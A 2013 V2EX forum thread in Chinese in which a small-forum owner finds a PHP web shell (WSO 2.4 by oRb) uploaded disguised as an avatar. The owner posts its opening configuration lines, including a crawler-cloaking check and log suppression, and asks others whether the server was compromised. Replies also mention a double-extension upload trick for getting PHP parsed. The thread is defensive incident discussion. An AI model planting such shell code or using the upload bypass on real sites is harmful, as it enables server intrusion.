GASALA
V2EX  ›  站长

小站被挂马了。。。

  •  
  •   GASALA · Mar 11, 2013 · 4473 views
    This topic created in 4817 days ago, the information mentioned may be changed or developed.
    一个小论坛,用的是thinksaas,对方注册账号,上传头像(伪装木马),直接打头像网址显示部分代码如下:

    <?php # Web Shell by oRb
    $auth_pass = md5("123456");
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';

    if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
    header('HTTP/1.0 404 Not Found');
    exit;
    }
    }

    @session_start();
    @ini_set('error_log',NULL);
    @ini_set('log_errors',0);
    @ini_set('max_execution_time',0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);
    @define('WSO_VERSION', '2.4');

    ....................

    请问怎样判断对方是否拿到了权限呢?
    10 replies    1970-01-01 08:00:00 +08:00
    jimmy2010
        1
    jimmy2010  
       Mar 11, 2013
    这样的木马是不起作用的吧,代码都没运行
    GASALA
        2
    GASALA  
    OP
       Mar 11, 2013
    @jimmy2010 打开那个人注册的页面杀软会弹出提示。。。

    我只贴出了一部分代码。。。你的意思是他这个马没有执行吗?
    icevil
        3
    icevil  
       Mar 11, 2013
    @GASALA 杀软是特征码识别,所以会弹出提示。
    除非你设置了.jpg等图片后缀解析为php,否则这样的静态文件是不会执行的吧。
    GASALA
        4
    GASALA  
    OP
       Mar 11, 2013
    @icevil 谢谢。这方面白痴。

    如果不能执行,那对方上传这段代码的意图是什么呢?
    icevil
        5
    icevil  
       Mar 11, 2013
    @GASALA 估计测试漏洞什么的吧,具体还要上传的人来回答。。
    你后台查询上传这头像的账号的ip然后block啊~
    jybox
        6
    jybox  
       Mar 11, 2013
    这个黑阔很可能已经得手了,现在他可以远程执行命令,至于是root权限还是www-data的权限,要看你的服务器的权限配置.

    他很可能在不止一个文件中挂了后门.
    GASALA
        7
    GASALA  
    OP
       Mar 11, 2013
    @jybox 对比之后没发现有系统文件被修改过。。。我已经删除了那个伪装的文件。

    请问怎样知道有没有登入过root或者怎么知道对方是否拥有了权限?
    jimmy2010
        8
    jimmy2010  
       Mar 11, 2013
    @jybox
    @GASALA
    不用惊慌,jpg格式的文件在可解析php的服务器上是不会被解析的。对方在测试能否上传木马而已,除非将木马以.php格式上传,才有可能执行。或者利用php的解析漏洞,上传成XX.php.rar之类的,也可以执行。总之,纯图片不用担心,不管图片的内容是什么,只要确保.jpg这个后缀无法修改就行
    1314258
        9
    1314258  
       Mar 11, 2013 via iPhone
    别以为jpg不会执行。
    notsobad
        10
    notsobad  
       Mar 12, 2013   ❤️ 1
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   1113 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 38ms · UTC 18:37 · PVG 02:37 · LAX 11:37 · JFK 14:37
    ♥ Do have faith in what you're doing.